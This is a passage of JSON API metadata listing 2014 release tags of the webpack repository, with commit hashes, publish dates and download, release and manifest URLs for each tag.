3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/w